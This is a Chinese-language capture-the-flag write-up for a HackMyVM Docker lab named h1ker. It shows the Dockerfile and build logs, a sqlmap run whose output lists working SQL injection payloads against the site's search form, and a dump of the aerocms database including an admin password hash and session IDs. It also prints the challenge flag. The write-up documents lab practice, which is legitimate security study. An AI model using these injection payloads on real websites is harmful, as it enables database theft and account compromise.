Docker - 059

备注

created by || rick

⏲️ Release Date // 2024-01-07

💀 Solvers // 7

🧩 Type // docker

flag

HMV{h1kinG_1s_s0_fUn}

运行 docker

建议对 Dockerfile 做一定修改，便于加快镜像的编译

FROM php:7.3-apache

# apt 更换镜像源，并更新软件包列表信息
RUN sed -i 's/deb.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list &&
    sed -i 's/security.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list
RUN apt-get update

RUN apt update && apt install -y mariadb-server mariadb-client && apt install -y supervisor
RUN docker-php-ext-install mysqli

COPY . /var/www/html
RUN chmod -R 0755 /var/www/html

COPY config/supervisord.conf /etc/supervisord.conf

EXPOSE 80

CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"]

编译镜像

randark@developer:~/code/h1ker-main$ docker build -t h1ker .
[+] Building 28.0s (13/13) FINISHED                                                                                                                                                                                         docker:default
 => [internal] load build definition from Dockerfile                                                                                                                                                                                  0.0s
 => => transferring dockerfile: 597B                                                                                                                                                                                                  0.0s
 => [internal] load metadata for docker.io/library/php:7.3-apache                                                                                                                                                                     3.0s
 => [internal] load .dockerignore                                                                                                                                                                                                     0.0s
 => => transferring context: 2B                                                                                                                                                                                                       0.0s
 => CACHED [1/8] FROM docker.io/library/php:7.3-apache@sha256:b9872cd287ef72bc17d45d713aa2742f3d3bcf2503fea2506fd93aa94995219f                                                                                                        0.0s
 => [internal] load build context                                                                                                                                                                                                     0.0s
 => => transferring context: 7.15kB                                                                                                                                                                                                   0.0s
 => [2/8] RUN sed -i 's/deb.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list &&     sed -i 's/security.debian.org/mirrors.ustc.edu.cn/g' /etc/apt/sources.list                                                                 0.2s
 => [3/8] RUN apt-get update                                                                                                                                                                                                          2.1s
 => [4/8] RUN apt update && apt install -y mariadb-server mariadb-client && apt install -y supervisor                                                                                                                                12.7s
 => [5/8] RUN docker-php-ext-install mysqli                                                                                                                                                                                           8.8s
 => [6/8] COPY . /var/www/html                                                                                                                                                                                                        0.0s
 => [7/8] RUN chmod -R 0755 /var/www/html                                                                                                                                                                                             0.4s
 => [8/8] COPY config/supervisord.conf /etc/supervisord.conf                                                                                                                                                                          0.0s
 => exporting to image                                                                                                                                                                                                                0.6s
 => => exporting layers                                                                                                                                                                                                               0.6s
 => => writing image sha256:e7fc722a0803cff8b9db894d303f5cd07788e9f1de229c18d4cb31ec0b28d3c0                                                                                                                                          0.0s
 => => naming to docker.io/library/h1ker

然后基于镜像启动一个容器

randark@developer:~/code/h1ker-main$ docker run --name=h1ker -d -p 1337:80 h1ker
1ffb5859282779260f56679b425fd0db47ce2d12cfc96cc5190fa4e0f6400960
randark@developer:~/code/h1ker-main$ docker ps
CONTAINER ID   IMAGE         COMMAND                  CREATED          STATUS          PORTS                                             NAMES
1ffb58592827   h1ker         "docker-php-entrypoi…"   10 seconds ago   Up 10 seconds   0.0.0.0:1337->80/tcp, :::1337->80/tcp             h1ker

测试服务

服务探测

在网站首页，发现一个搜索框，怀疑存在 sql 注入攻击的可能性，sqlmap 自动化测试看看

┌─[randark@parrot]─[~]
└──╼ $sqlmap -u http://192.168.163.135:1337/index.php --forms --batch
......
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:
---
Parameter: search (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: search=BxPV' OR NOT 6515=6515#&submit=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search=BxPV' AND (SELECT 4812 FROM(SELECT COUNT(*),CONCAT(0x716b6a7671,(SELECT (ELT(4812=4812,1))),0x717a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IQIK&submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=BxPV' AND (SELECT 8834 FROM (SELECT(SLEEP(5)))dPAT)-- UhGJ&submit=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: search=BxPV' UNION ALL SELECT NULL,NULL,CONCAT(0x716b6a7671,0x666868444e456363506f657a4157695a7863667459516b4b424554574654667379544a784d475644,0x717a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&submit=
---

数据库爬取

dbs

[*] aerocms
[*] information_schema
[*] mysql
[*] performance_schema

aerocms - tables

Database: aerocms
[5 tables]
+--------------+
| categories   |
| comments     |
| posts        |
| users        |
| users_online |
+--------------+

将表中的所有数据爬取下来

aerocms - tables - data

Database: aerocms
Table: users
[1 entry]
+---------+--------------------------------------------------------------+-------------------------------+----------+-----------+-------------------+------------+---------------+----------------+
| user_id | password                                                     | randSalt                      | username | user_role | user_email        | user_image | user_lastname | user_firstname |
+---------+--------------------------------------------------------------+-------------------------------+----------+-----------+-------------------+------------+---------------+----------------+
| Admin   | $2a$12$M8KMzrASFLbF.tEyC5bGRebyfk/.wyQn0yt39GbZi8TfixfgKo9Zm | $2y$10$iusesomecrazystrings22 | <blank>  | <blank>   | admin@example.net | admin      | <blank>       | 1              |
+---------+--------------------------------------------------------------+-------------------------------+----------+-----------+-------------------+------------+---------------+----------------+

Database: aerocms
Table: users_online
[23 entries]
+----+------------+----------------------------+
| id | time       | session                    |
+----+------------+----------------------------+
| 1  | 1525603889 | pf2ovmbhtdn7dtrli83rjetlv6 |
| 2  | 1525600070 | g4eaojs9lup5uoi9clh0a7dlj2 |
| 3  | 1525600816 | u5b26mae8k9upvdf0loiv4qh80 |
| 4  | 1525603284 | 7dg0jaipc161dirait3omf4fk0 |
| 5  | 1525603543 | p9e0jf3ama3n4hvbp6eknime52 |
| 6  | 1525753912 | hqhn3mcl82dg0t12i01do5gkp2 |
| 7  | 1525837122 | krkd2v356t3jv5k5d2v6sa4om6 |
| 8  | 1525861608 | 04nli9lc34bfm8qnnbn0s47t63 |
| 9  | 1525925780 | drpe2pej7n3glgdkgltdu59ft1 |
| 10 | 1526038120 | nvqkpc95pdac56qmctcrm89jh0 |
| 11 | 1526200326 | 66isnml6mnu741n3r5q9s5m956 |
| 12 | 1526219068 | jdicp9b8bbek3opi4b7970lo02 |
| 13 | 1526268404 | 8o8u5o0gglhrok5fjobnrll0s0 |
| 14 | 1526273159 | ins7sdp4b5gbb079c4kv5hd734 |
| 15 | 1526306904 | rmtl5qd6uo6nadc4ql7fifcr47 |
| 16 | 1526312831 | 7d1vov1qav2kgbi18hrcgtcmd2 |
| 17 | 1526355967 | 7sjflm0u8i7qonakjs6341jdl1 |
| 18 | 1526395857 | 32hpoav8ksrhvi4qd7f5iisdh7 |
| 19 | 1526441933 | b51ki4eoffu1a3suqagcjcb662 |
| 20 | 1633389690 | 05t149k9ossbtvs3l0lb24u9up |
| 21 | 1633405608 | 5kavrpik2i0gl4cdskfif3c9gj |
| 22 | 1633487781 | 6ek6d59pvjf8a8a5dr7b7ivu5r |
| 23 | 1633487237 | 56sf778beevhfl7c95mhtvs1km |
+----+------------+----------------------------+

Database: aerocms
Table: categories
[2 entries]
+--------+---------------+
| cat_id | cat_title     |
+--------+---------------+
| 1      | Default       |
| 2      | Hiking Trails |
+--------+---------------+

注意

环境有点问题，没有办法进入后台，从而没有办法上传文件形成 webshell，也没有办法通过 sqlmap 形成 webshell